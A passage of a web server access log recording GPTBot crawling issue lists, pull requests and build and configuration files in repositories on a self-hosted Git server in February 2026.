-[17/Feb/2026:18:37:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11618] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:37:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:37:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=leastcomment&state=closed&type=all" -[17/Feb/2026:18:37:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=mostcomment&state=closed&type=all" -[17/Feb/2026:18:37:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 46760] [Gzip 22.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:18:37:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 9987] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:18:37:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 22369] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:18:37:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=recentupdate&state=closed&type=all" -[17/Feb/2026:18:37:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" -[17/Feb/2026:18:37:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" -[17/Feb/2026:18:37:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" -[17/Feb/2026:18:37:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" -[17/Feb/2026:18:37:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10008] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:18:37:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9997] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=nearduedate&state=closed&type=all" -[17/Feb/2026:18:37:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=mostcomment&state=open&type=all" -[17/Feb/2026:18:37:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10165] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=recentupdate&state=open&type=all" -[17/Feb/2026:18:37:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=leastcomment&state=open&type=all" -[17/Feb/2026:18:37:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 9992] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=farduedate&state=open&type=all" -[17/Feb/2026:18:37:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=farduedate&state=closed&type=all" -[17/Feb/2026:18:37:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=farduedate&state=open&type=all" -[17/Feb/2026:18:37:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10168] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=farduedate&state=open&type=all" -[17/Feb/2026:18:37:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=farduedate&state=open&type=all" -[17/Feb/2026:18:37:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 11013] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:18:37:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11635] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:18:37:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 18935] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:18:37:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 11014] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:18:37:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 18937] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:18:37:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 9971] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&sort=latest&state=all&type=all" -[17/Feb/2026:18:37:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 9974] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&sort=latest&state=all&type=all" -[17/Feb/2026:18:37:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 11224] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:18:37:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13787] [Gzip 4.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:18:37:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/tempCodeRunnerFile.py?display=source" [Client 74.7.227.38] [Length 13914] [Gzip 3.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/tempCodeRunnerFile.py" -[17/Feb/2026:18:37:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:18:37:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10018] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:18:37:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10069] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:18:37:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-1.conf?display=rendered" [Client 74.7.227.38] [Length 11223] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-1.conf" -[17/Feb/2026:18:37:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-4.conf?display=rendered" [Client 74.7.227.38] [Length 11220] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-4.conf" -[17/Feb/2026:18:37:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-7.conf?display=rendered" [Client 74.7.227.38] [Length 11222] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-7.conf" -[17/Feb/2026:18:37:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-2.conf?display=rendered" [Client 74.7.227.38] [Length 11215] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-2.conf" -[17/Feb/2026:18:37:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-6.conf?display=rendered" [Client 74.7.227.38] [Length 11219] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-6.conf" -[17/Feb/2026:18:37:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83?files=PostgresMonitor%2fdist%2fPostgresWatchdog.exe" [Client 74.7.227.38] [Length 17050] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/dist/PostgresWatchdog.exe" -[17/Feb/2026:18:37:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 9986] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=mostcomment&state=open&type=all" -[17/Feb/2026:18:37:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=farduedate&state=open&type=all" -[17/Feb/2026:18:37:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:18:37:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9999] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:18:37:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10167] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:18:37:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:18:37:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10004] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:18:37:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:18:37:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11638] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:18:37:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 9979] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&sort=oldest&state=all&type=all" -[17/Feb/2026:18:37:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:37:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=latest&state=all&type=all" -[17/Feb/2026:18:37:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10182] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastcomment&state=open&type=all" -[17/Feb/2026:18:37:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-1_access.log?display=rendered" [Client 74.7.227.38] [Length 11185] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-1_access.log" -[17/Feb/2026:18:37:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11084] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:18:37:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-4_access.log?display=rendered" [Client 74.7.227.38] [Length 11184] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; 